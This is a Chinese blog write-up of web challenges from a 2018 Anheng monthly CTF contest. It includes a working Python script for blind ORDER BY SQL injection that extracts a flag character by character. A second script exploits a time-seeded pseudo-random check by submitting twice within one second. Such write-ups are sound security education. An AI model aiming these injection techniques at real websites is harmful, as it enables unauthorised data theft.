2018安恒月赛wp——web

最新推荐文章于 2023-05-31 20:23:57 发布
最新推荐文章于 2023-05-31 20:23:57 发布
阅读量2.1k 收藏 1
点赞数 1
分类专栏: 比赛wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37432787/article/details/81148860
版权

边听大佬直播边写wp

第一题:sql注入

提示信息:

  • order注入
  • select flag from flag

order注入表示利用布尔注入看最终的排序情况
select flag from flag表示不用查库查表,直接上手

直接跑python脚本

import  requests

payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.{}?!')
sjk = ''

for i in range(1,30):
    for j in payloads:
        response = requests.get('http://101.71.29.5:10004/?order=if(substr((select%%20flag%%20from%%20flag),%s,1)=%%27%s%%27,name,id)&button=submit' % (i,j))
        data=response.content.decode("utf-8")
        if data.find('Beer')<data.find('snacks'):
            sjk+=j
            print(j)
            break
print(sjk)

这里写图片描述

第二题:

一开始想成是md5的hash扩展长度攻击,但是有没有办法匹配。又想是key的遍历,觉得也不太靠谱。时间戳倒是想到了,但是没想到是一秒内时间戳,看了wp就已经懂了。

随机函数是由时间戳决定的,属于伪随机,精度为秒。
当我们随便输入一串md5时,他会给出刚才提交时的时间戳形成的 resault r e s a u l t 我 们 可 以 编 写 脚 本 , 在 一 秒 内 实 现 两 次 递 交 , 将 得 到 的 resault再次提交以获得flag

import requests
import re
import io
import sys

url="http://192.168.32.128/flag.php"
s=requests.Session()
s.encoding='utf-8'
payload={'answer':'6dc32db3170899e5b138eb4becaf69a8'}
q=s.post(url,data=payload)
html_doc=q.content.decode('utf-8')
payload={'answer':html_doc[160:192]}
q=s.post(url,data=payload)
print(q.content.decode('utf-8'))

具体实现等下周二复现。

第三题

原谅我不会写。等下周二复现。

注:第一题sqlmap的用法等下周二复现,第二题具体操作等下周二复现,第三题所有做法等下周二复现。

xixixihhh
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
安恒月赛19年1月wp
南天_princess的博客
02-08 785
web1 babygo 这个是php反序列化的题,打开题目获得源码如下: &amp;amp;lt;?php @error_reporting(1); include 'flag.php'; class baby { protected $skyobj; public $aaa; public $bbb; function __construct() { ...
2018-10月安恒逆向题目
10-29
2018年10月安恒月赛逆向题目。
安恒月赛writeup 2018年12月
SsMing的博客
12-23 1475
目录 misc1 misc2(签到) misc3 (学习资料) misc4(JUJU) web1 web2 pwn1 misc和web,和一道pwn misc1 看提示想到去下当时泄露的库 然后写脚本处理一下把数据库的内容,生成三个由用户名,密码,邮箱组成的字典,使用密码组成的字典爆开了压缩包 解压后得到个动图,记录上面的数字得到236855282761588523...
2018-07-28 七月月赛
zm_zsy的博客
07-28 479
A  -- 商 Description 编一个程序求A/B的值 ,要求精确到小数点后N位(N&lt;=80的自然数,并且A&lt;B,A和B是整型 数范围),不足N位的用“0”补齐。例如:精确到小数点后9位:6/7=0.857142857。输入A、B、N, 求A/B Input 输入文件: 只有一行,就是A,B,N Output 输出文件: 只有一行,就是A/B的结果 Sample...
CISCN国赛--wp
qing_chuan_的博客
05-31 706
第一次参加国赛,我一个小菜鸡,真的纯纯是坐牢。
2020国赛部分re -- wp
Air_cat的博客
08-21 654
re1: idapy 扒校验数组: from __future__ import print_function#支持py2使用py3的函数 from __future__ import print_function#支持py2使用py3的函数 sea = 0x404020 for i in range(sea,sea+0xa8,4): print('0x%x'%(Byte(i+1)),end="") print(('%x'%Byte(i)+','),end="") 注意部分元素补0 from z
第十四届全国大学生信息安全竞赛部分wp
热门推荐
qq_46540840的博客
05-16 1万+
第十四届全国大学生信息安全竞赛部分wp前言MISC-Robotmisc running_pixel密码学RSAweb1Re1web2总结 前言 第一次参加国赛,更让我清楚意识到自己是fw,做出几道题记录一下,期待自己的进步成长 MISC-Robot 下载得到 结合题目是机器,要求是找字符,百度一下rspag后缀名打开文件,看样子是要找坐标了 正好给了流量包wireshark打开追踪tcp流量,找坐标关键字眼,找的话有点麻烦直接搜pos看到关键内容 这里采用正则表达式直接提取出来正则yyds pytho
安恒明鉴web漏洞扫描器
01-20
安恒明鉴Web漏洞扫描器】是一款专业的网络安全工具,主要针对Web应用程序的安全性进行深度检测,以发现潜在的漏洞并帮助企业或个人提前预防网络攻击。这款扫描器使用了先进的扫描技术和策略,能够自动化地执行多种...
安恒月赛题目参赛源码+项目说明.zip
最新发布
01-23
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。 ...安恒月赛题目参赛源码+项目说明.zip
ctf web培训资料pdf
10-06
通过url访问靶机web站点,观察页面中的功能点,对可能存在漏洞的页面进行探测。 常见的漏洞特征: SQL注入:www.example.com?id=1 文件包含:www.example.com?page=file1.php 文件上传
安恒信息明御WEB应用防火墙产品白皮书.doc
11-09
安恒信息明御WEB应用防火墙产品白皮书.doc
2018.7 月赛题解 锐角三角形
qibage的博客
07-13 324
是否存在面积为 S2 的整点锐角三角形?存在输出 Yes 并输出三个整点坐标, 否则输出 No。 注意如果存在输出的坐标必须在 long long 范围内。Input第一行一个整数 S (1≤S≤1018),表示锐角三角形面积。Output第一行一个字符串。 若存在接下去三行,每行两个整数 x,y ,表示三角形三个点的坐标。ExamplesInput9 OutputYes 0 0 3 0 1 3...
2023 ciscn国赛pwn lojin wp
cainiao78777的博客
05-29 2384
第一次参加国赛,被队友带飞了,pwn只做出来了四个,1381分,第16名,总体来说还可以在所有题目中,也是拿到了pwn题login的一血话说回来,来详细说一下,这个pwn题的解法首先就是能看到这是个没附件的pwn题说明只能通过交互去得到信息,再寻找方向,连接之后应该就是这四个选项。
密码学&安恒月赛
qq_41509200的博客
02-22 588
爆破出
安恒月赛writeup 2019年2月
SsMing的博客
02-24 2387
新年劝退赛,菜的真实,web一题不会,暴风流泪 MISC 玩游戏 下载附件后,得到一个exe和题目说明,运行exe后,发现题目分为三个关卡 第一关 看见是解盲文,有在线解盲文的网站,解密后为下面图中所示 看见这一串,数了位数后怀疑是一个字符串的md5值,百度之后发现是 hello 的MD5值,第一关通过 第二关 要提交两个MD5值相同的文件,使用工具fastcoll (...
2018二月安恒月赛WRITE UP
郁离歌丶的博客
03-12 5881
二月安恒月赛WRITE UPCRYPTO凯撒?替换?呵呵!题目说明:MTHJ{CUBCGXGUGXWREXIPOYAOEYFIGXWRXCHTKHFCOHCFDUCGTXZOHIXOEOWMEHZO}answer:这题可以秒解,因为flag格式是flag{},所以MTHJ应该替换成flag。掏出杀器替换网站quipquip真的是秒解,遗憾没打这比赛,一分钟不到就拿一血是怎样一种体验233333允许...
安恒月赛writeup 2019年1月
SsMing的博客
01-26 2938
  目录 web1 pwn2 misc1 misc2 reverse1 crypt1 新的一年,各位师傅太强了 web1 访问后看见源码 &lt;?php @error_reporting(1); #include 'flag.php'; class baby { protected $skyobj; public $aaa; pu...
安恒月赛-2019年6月-web
wyj_1216 House
07-02 3247
localview 题目 有个傲娇的管理员,只能从本地才能看到想要的~答案提交flag{}括号内的值。 writeup 根据题目提示 有两个注意点: 1、管理员 2、从本地 据此,我一开始进入了一条死路,直接在index.php的基础上,抓包,然后xff,实现欺骗,没有达到预期发现,于是考虑到管理员这一提示 正确解题过程: 首先先扫一下: 发现admin.php可访问, 于是访问后,发现: ...
2018安恒三月月赛-WRITE-IP
郁离歌丶的博客
04-03 6779
打QWB去了,安恒没怎么看2333333333再次感谢榕榕给我的题目QAQ...CRYPTORSA拿到两个文件,一个flag.enc一个pub.key。最简单的rsa,直接秒了。事实是我也拿了一血。(居然把密码学的题放在re里面,猥琐2333333)从pub.key里面提取出n和e,具体可以看我之前写过的笔记《关于rsa的openssl命令一些随笔。》然后再把n放到http://factordb....
明御数据库审计与风险控制系统——安恒信息安全解决方案
"安恒数据安全审计方案" 安恒公司的数据安全审计方案,即明御TM数据库审计与风险控制系统,是一款专为政府和企业核心数据库设计的安全产品。该系统旨在提供全面、细粒度的保护,确保数据库的安全性,实现对异常行为...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值